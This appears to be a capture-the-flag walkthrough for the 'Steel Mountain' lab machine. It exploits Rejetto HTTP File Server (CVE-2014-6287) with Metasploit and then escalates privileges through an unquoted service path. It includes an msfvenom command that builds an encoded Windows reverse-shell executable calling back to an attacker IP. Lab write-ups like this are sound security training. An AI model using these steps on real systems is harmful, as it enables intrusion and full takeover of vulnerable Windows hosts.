# Task 1

Deploy and scan the machine

1. Who is the employee of the month?

Right click on the photo > View Image> `http://10.10.80.228/img/BillHarper.png`

A: Bill Harper

# Task 2 Initial Access

1. Scan the machine with nmap. What is the other port running a web server on?

![stell](/img/SteelMountain/steel scan.png)

- A: 8080

2. Take a look at the other webserver. What file server is running?

- Go to <ip>:8080
- Click on HttpFileServer 2.3 

![otherserver](/img/SteelMountain/other-server.png)

- Answer: Rejetto HTTP File Server

3. What is the CVE number to exploit this file server?

Search "HTTP File server" on exploit-db.com

Answer: 2014-6287 

4. Use Metasploit to get an initial shell. What is the user flag?

Run `msfconsole`

`search rejetto`
`use 0`
`show options`
`set RHOSTS <ip>`
`set LHOST <thm ip>`
`set RPORT 8080`

in msf, `exploit`

get into shell, go to `C:\Users\bill\Desktop`
`cat user.txt` to get flag

# Task 3 
- Download the ps1 file
![power-up](/img/SteelMountain/power-up.png)
- To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

![ps](/img/SteelMountain/loadps.png)

1. Take close attention to the CanRestart option that is set to true. What is the name of the name of the service which shows up as an unquoted service path vulnerability?

![un](img/SteelMountain/unquoted.png)

- Answer: AdvancedSystemCareService9



The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as an Windows executable.

Run `msfvenom -p windows/shell_reverse_tcp LHOST=10.6.31.49 LPORT=4443 -e x86/shikata_ga_nai -f exe -o Advanced.exe`

![venom](/img/SteelMountain/msfvenom.png)

Upload the executable and stop the service

![stop](/img/SteelMountain/stop.png)

Copy the executable to overwrite the old one

![copy](/img/SteelMountain/copy.png)

Set up a netcat listening port because I kept getting `Start Service Failed` error with metasploit multi handler

![netcat](/img/SteelMountain/netcat.png)


Got a shell! Noow navigate to C:\Users\Administrator\Desktop

`more root.txt` to get the flag

![rootflag](/img/SteelMountain/rootflag.png)

# Task 4 - Access and Escalation without Metasploit
- What powershell -c command could we run to manually find out the service name?

- Answer powershell -c "Get-Service"

